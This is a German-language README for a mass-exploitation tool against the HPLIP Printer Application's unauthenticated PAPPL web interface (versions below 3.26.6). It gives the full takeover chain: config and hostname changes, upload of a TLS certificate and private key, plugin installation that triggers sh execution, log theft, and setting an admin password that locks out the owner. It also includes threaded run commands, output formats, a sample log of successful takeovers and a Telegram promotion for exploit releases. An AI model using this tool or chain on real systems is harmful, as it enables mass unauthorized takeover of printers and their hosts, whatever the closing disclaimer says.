
HPLIP < 3.26.6 — Vollständige Admin-Übernahme über die PAPPL-Weboberfläche (keine Authentifizierung). Verwandt mit CVE-2026-91097 bis CVE-2026-91106 (CVSS 9.3)
🔬 Tritt Telegram bei für die neueste Schwachstellenforschung und Exploit-Veröffentlichungen
Mass-Exploitation-Tool, das auf die HPLIP Printer Application (PAPPL-basierte Weboberfläche) in allen HPLIP-Versionen vor 3.26.6 abzielt. Das Tool nutzt den standardmäßig unauthentifizierten Zustand der PAPPL-Weboberfläche aus, um eine vollständige administrative Übernahmekette durchzuführen: Manipulation der Konfiguration, Änderung des Hostnamens, Austausch des TLS-Zertifikats, Installation des HP-Plugins (löst die Shell-Ausführung der .run-Datei auf dem Zielsystem aus), Exfiltration der Systemprotokolle und Sperrung des Admin-Passworts.
Die Kernschwachstelle ist der PAPPL Unauthenticated Administrative Access — die HPLIP Printer Application wird standardmäßig ohne konfiguriertes Passwort ausgeliefert, wodurch jeder Netzwerkangreifer alle administrativen Aktionen ohne Authentifizierung über die Weboberfläche (typischerweise Port 8000) durchführen kann.
Darüber hinaus nutzt die Plugin-Installationskette Schwachstellen aus, die in folgenden Punkten behandelt werden:
| CVE | CWE | CVSS 4.0 | Relevanz |
|---|---|---|---|
| CVE-2026-91097 | CWE-94 / CWE-787 | 7.0 | Path Traversal in plugin.spec — die von diesem Tool ausgelöste Plugin-Installation durchläuft den anfälligen pluginhandler.py-Code |
| CVE-2026-91102 | CWE-78 / CWE-494 | 8.4 | Download Without Integrity Check — die Plugin-.run-Datei wird über HTTP heruntergeladen und mit sh auf dem Zielsystem ausgeführt |
HP Security Bulletin: HPSBPI04151
| Endpunkt | Aktion | Verifiziert |
|---|---|---|
/security | Admin-Passwort setzen (Account-Übernahme) | ✅ |
/config | DNS-SD-Name, Standort, Organisation, Kontakt ändern | ✅ |
/network | System-Hostname ändern | ✅ |
/tls-install-crt | Beliebiges TLS-Zertifikat + privaten Schlüssel hochladen | ✅ |
/plugin | HP-Plugin-Download + Lizenzannahme + Installation auslösen (führt .run mit sh aus) | ✅ |
/logfile.txt | Vollständige Anwendungsprotokolldatei lesen (Informationsoffenlegung) | ✅ |
Zielerkennung
│
▼
HPLIP Printer Application erkennen (Server-Header + Version)
│
▼
Authentifizierungsstatus prüfen (/security)
│
├── Passwort gesetzt ──► Als VULN protokollieren (gesperrt)
│
└── Kein Passwort (Standard) ──► Ausnutzungskette:
│
├── 1. Konfiguration ändern (/config)
│ dns_sd_name, location, organization, contact_name
│ Verifiziert: Marker in der Antwort reflektiert
│
├── 2. Hostname ändern (/network)
│ Alter Hostname erfasst, neuer Hostname gesetzt
│ Verifiziert: neuer Wert in der Antwort reflektiert
│
├── 3. TLS-Zertifikat hochladen (/tls-install-crt)
│ Benutzerdefiniertes PEM-Zertifikat + privater Schlüssel
│ Multipart-Datei-Upload
│
├── 4. HP-Plugin installieren (/plugin)
│ Schritt 1: POST action=install-plugin (lädt .run herunter)
│ Schritt 2: POST action=license-accepted (führt mit sh aus)
│ ⚠ CVE-2026-91097 + CVE-2026-91102
│
├── 5. Protokolldatei lesen (/logfile.txt)
│ Systempfade, Umgebungsinformationen, Snap-Pfade
│
└── 6. Admin-Passwort setzen (/security)
Sperrt weiteren unauthentifizierten Zugriff
Vollendet die vollständige Admin-Übernahme
pip install requests
Python 3.8+ erforderlich. Keine weiteren Abhängigkeiten.
python T.py targets.txt 50
| Argument | Beschreibung | Standard |
|---|---|---|
targets.txt | Datei mit Zielliste (eine pro Zeile) | Wird abgefragt |
50 | Anzahl gleichzeitiger Threads | 15 |
python T.py
Das Tool fragt nach der Zieldatei und der Thread-Anzahl.
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
8000 verwendet# beginnen, werden ignoriert| Datei | Inhalt |
|---|---|
AdminS.txt | Admin-Übernahme — Passwort, Serverversion, vollständige Panel-URL-Zuordnung |
Nx_modify.txt | Verifizierte Konfigurations- und Hostnamenänderungen (alte → neue Werte) |
Nx_upload.txt | Bestätigungen des TLS-Zertifikat-Uploads |
Nx_plugin.txt | Ergebnisse der HP-Plugin-Installation mit Shell-Ausführungsstatus |
Nx_recon.txt | Informationsoffenlegung — Protokolldateigröße, Umgebungspfade, Version |
AdminS.txthttp://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...
Nx_modify.txthttp://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
██████ ██ ██ ██
██ ███ ██ ██ ██
██ ██████ ███
██ █████ ██ ██
██ ████ ██ ██
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
HPLIP Printer Application │ Admin-Übernahme + Volle Kontrolle
Betroffen < 3.26.6 │ PAPPL Unauthentifizierter Zugriff
CVE-2026-91097 │ Plugin Path Traversal
CVE-2026-91102 │ Plugin-Download ohne Integritätsprüfung + Shell-Ausführung
Ausgenutzt über Web: /security /config /network /plugin /tls-install-crt /logs
Von: Nxploited ( Khaled Alenazi ) │ Telegram: @Kxploit
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
targets=4 threads=4
00:11:34 [CUPS ] http://192.168.1.100:8000 Server: HPLIP_Printer_Application/3.22.10-13
00:11:34 [VER ] http://192.168.1.100:8000 v3.22.10 < 3.26.6 BETROFFEN
00:11:35 [PROBE ] http://192.168.1.100:8000 v3.22.10 | KEINE AUTH | ausnutzen...
00:11:36 [CFG ] http://192.168.1.100:8000 KONFIGURATION GEÄNDERT | marker=abc12345
00:11:37 [NET ] http://192.168.1.100:8000 HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
00:11:38 [CERT ] http://192.168.1.100:8000 TLS-ZERTIFIKAT HOCHGELADEN | marker=abc12345
00:12:03 [PLG ] http://192.168.1.100:8000 PLUGIN | freshly_installed | shell_exec=True
00:12:05 [LOG ] http://192.168.1.100:8000 logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
00:12:05 [ADMIN ] http://192.168.1.100:8000 PASSWORT GESETZT | pw=Nx-zD_buovl6wko0
00:12:05 [HIT ] http://192.168.1.100:8000 v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
FERTIG 4/4 █ HIT=4 █ VULN=0 █ SAFE=0 █ SKIP=0
▐ Admin-Übernahme: 4 └─ AdminS.txt
▐ Modifikationen : 8 └─ Nx_modify.txt
▐ Zert-Uploads : 4 └─ Nx_upload.txt
▐ Plugin-Ausführung : 1 └─ Nx_plugin.txt
▐ Recon / Info : 8 └─ Nx_recon.txt
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
| Tag | Bedeutung |
|---|---|
HIT | Erfolgreich ausgenutzt — Admin-Übernahme erreicht |
VULN | Anfällig, aber Passwort bereits gesetzt (gesperrt) |
SAFE | Version ≥ 3.26.6 (gepatcht) |
SKIP | Keine HPLIP Printer Application oder nicht erreichbar |
/var/snap/hplip-printer-app/common/ gespeichert werdensh plugin.run --keep --nox11 aus, was die offizielle Plugin-Binärdatei von HP ausführt — der Inhalt wird von HP-Servern heruntergeladen; der Angreifer kontrolliert den Plugin-Inhalt nicht, löst aber dessen Ausführung ausVon: Nxploited
Dieses Tool wird ausschließlich für autorisierten Sicherheitsforschung, Penetrationstests und Bildungszwecke bereitgestellt. Die Verwendung dieses Tools gegen Systeme ohne ausdrückliche schriftliche Genehmigung des Systemeigentümers ist illegal und unethisch. Der Autor übernimmt keine Haftung für Missbrauch, Schäden oder rechtliche Konsequenzen, die sich aus der Verwendung dieses Tools ergeben. Holen Sie stets eine ordnungsgemäße Autorisierung ein, bevor Sie Sicherheitsbewertungen durchführen. Durch die Verwendung dieses Tools erklären Sie sich damit einverstanden, dass Sie allein für Ihre Handlungen und die Einhaltung aller geltenden Gesetze und Vorschriften verantwortlich sind.